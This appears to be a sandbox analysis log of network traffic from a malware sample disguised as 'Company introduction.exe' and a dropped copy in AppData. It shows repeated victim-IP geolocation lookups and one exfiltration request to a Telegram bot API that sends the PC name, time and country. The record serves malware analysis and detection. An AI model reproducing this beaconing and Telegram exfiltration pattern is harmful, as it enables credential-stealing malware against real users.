2025-01-15 07:39:10 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49752 | 104.21.48.1 | 443 | 7812 | C:\Users\user\Desktop\Company introduction.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-15 07:39:10 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-15 07:39:10 UTC | 853 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Jan 2025 07:39:10 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2241539
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hwACZQW2%2BA8WFlRVAXTKAiv63vnOe8dh0gMyrEkh3RCyNFQdtOb1LRgGhyUpIR9RRME9ZShimXodBUpqNPdjsHe63RSNvkOmjqFa4zsKz3lwLma9m9KUeEmBqHGZtW60%2F26UDSTn"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 902435dffa3c43be-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1575&rtt_var=601&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1804697&cwnd=229&unsent_bytes=0&cid=cebdb9134d40f1a4&ts=144&x=0"
2025-01-15 07:39:10 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49755 | 104.21.48.1 | 443 | 8144 | C:\Users\user\AppData\Roaming\FzXKnGk.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-15 07:39:11 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-15 07:39:11 UTC | 855 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Jan 2025 07:39:11 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2241540
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uBNxvjQFERGbkYTqiv4le2KTqXPodPc6K3kNb6Dtwrl%2B1oGgFl8Ge72L9n3lHGCafVD4jAfl%2FGXarm%2BemBIHOa1LSq8ZPN2MZPODN1Fb2MK36qOIMgk61ARS4OJ15n11KqCVsxsM"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 902435e64f048c15-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1757&min_rtt=1753&rtt_var=666&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1634023&cwnd=238&unsent_bytes=0&cid=80f9c6b72bdbccf5&ts=156&x=0"
2025-01-15 07:39:11 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49756 | 104.21.48.1 | 443 | 7812 | C:\Users\user\Desktop\Company introduction.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-15 07:39:11 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-15 07:39:12 UTC | 853 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Jan 2025 07:39:12 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2241541
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lZU3DBjfcr0VPVzPe7sNHOX1LVEl3RhDNlpdCsgM8nJGVWSqxaEy3r3hzp5Tx1brbKnrj%2BVSipKKPHLy7zyLEJR8%2BlQLgFynNz56O4yrZoH7ln6T4pxLD3tJDvqMbihbEAiYZAzN"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 902435e80e54c323-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1479&rtt_var=567&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1910994&cwnd=214&unsent_bytes=0&cid=7ff236c0476b9076&ts=151&x=0"
2025-01-15 07:39:12 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49759 | 104.21.48.1 | 443 | 8144 | C:\Users\user\AppData\Roaming\FzXKnGk.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-15 07:39:12 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-15 07:39:13 UTC | 861 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Jan 2025 07:39:12 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2241542
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sv%2FM03OUmCUqZvsNtME3jyDdaAcvsDMbuLd5WSYW%2FKWQK6Hl48jTCnuZkz6j3HgmnnmhjX%2B4e%2F0JzFHyi%2FVtnI1szb9%2BL2M9LOz7X9jKh4121PLu9WHWCCBAWV5Oao5u6r97kcLx"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 902435edff4a42e9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1634&rtt_var=621&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1748502&cwnd=241&unsent_bytes=0&cid=8fc070524ceb9da7&ts=121&x=0"
2025-01-15 07:39:13 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49760 | 104.21.48.1 | 443 | 7812 | C:\Users\user\Desktop\Company introduction.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-15 07:39:13 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-15 07:39:13 UTC | 853 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Jan 2025 07:39:13 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2241542
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BRtUpWI3iKqwhN7301movk1AMac74D0Tdo6DsCXXrhk4cQq1xFSANFAh7LihxcSTWPXAJi2%2BlGi53GXL8I75ppbbXRjNTpvzz8lRWq7hTqfFLpW4Ze8vYofs7pBHosbBVKY4yap"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 902435eff8bbc323-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1435&min_rtt=1425&rtt_var=555&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1933774&cwnd=214&unsent_bytes=0&cid=109e949d2327b61b&ts=143&x=0"
2025-01-15 07:39:13 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49763 | 104.21.48.1 | 443 | 8144 | C:\Users\user\AppData\Roaming\FzXKnGk.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-15 07:39:14 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-15 07:39:14 UTC | 855 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Jan 2025 07:39:14 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2241543
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CgG%2B%2FPLDyxSlnxzOh9NgqPPoItiEt1vwX68pqFvJl4oBfMcpoXfYml%2F8wcFHV9xoXLNUt5wxxp1hFz7SMxtXYeyJ0EQnyWimP4LPSPFceQJMEoJfOsIJcIIeQF22bPwnzqWW5db5"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 902435f60d0643be-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1572&rtt_var=627&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1692753&cwnd=229&unsent_bytes=0&cid=5007d2227f1337ee&ts=155&x=0"
2025-01-15 07:39:14 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49764 | 104.21.48.1 | 443 | 7812 | C:\Users\user\Desktop\Company introduction.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-15 07:39:14 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-15 07:39:14 UTC | 863 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Jan 2025 07:39:14 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2241543
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7MtG1XJaFtvpBci13fnfR%2FcRirjg4TJD%2FIxPAmd%2Fcd7QI8%2FcdshcfEedHtx4%2BfQ00uL5lIBgAttZzJa6%2BQsgEWFwLpufrrOhwTidpgtOEnnfd7PtOWEUIBD%2BycAROT628vH9QCA3"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 902435f79f758c15-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1773&min_rtt=1772&rtt_var=667&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1637689&cwnd=238&unsent_bytes=0&cid=7d14981d0e7c0a7b&ts=121&x=0"
2025-01-15 07:39:14 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49766 | 149.154.167.220 | 443 | 7812 | C:\Users\user\Desktop\Company introduction.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-15 07:39:15 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2015/01/2025%20/%2014:34:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2025-01-15 07:39:15 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Wed, 15 Jan 2025 07:39:15 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-15 07:39:15 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49767 | 104.21.48.1 | 443 | 8144 | C:\Users\user\AppData\Roaming\FzXKnGk.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-15 07:39:15 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-15 07:39:15 UTC | 857 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Jan 2025 07:39:15 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2241544
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qDjT1mA4ou2PJBNi99bmDgYxjZHZjcGNooNtgzHcPXKBmuNQX%2BlbqW09GAODWAsWhr6%2BPyafRSz70VGxShtRhQ%2BqkJ9sK1Sjaol2wczXDts18t4ZurADKYm7aOncUWA0J%2BL1pgBP"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 902435fe3c78c323-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1443&min_rtt=1437&rtt_var=551&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1966329&cwnd=214&unsent_bytes=0&cid=36478c3052d6f528&ts=153&x=0"
2025-01-15 07:39:15 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49770 | 104.21.48.1 | 443 | 8144 | C:\Users\user\AppData\Roaming\FzXKnGk.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-15 07:39:16 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-15 07:39:16 UTC | 865 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Jan 2025 07:39:16 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2241545
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F9w%2BnESlJq0vbgMa6gq87a%2B97afYp%2BMGZBMOiTJEhFo8qcyWQgvSkHO8k%2FI2ZPCcA2x2EvoPA0KYP6Cgz35Md3ug90pDd%2BvWxpClEN62DWSojryD09VAq4ld5EX6tDOqGzvMj%2F%2Bk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 902436063f2fc461-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1448&min_rtt=1437&rtt_var=561&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1914754&cwnd=232&unsent_bytes=0&cid=3f793fa416128135&ts=144&x=0"
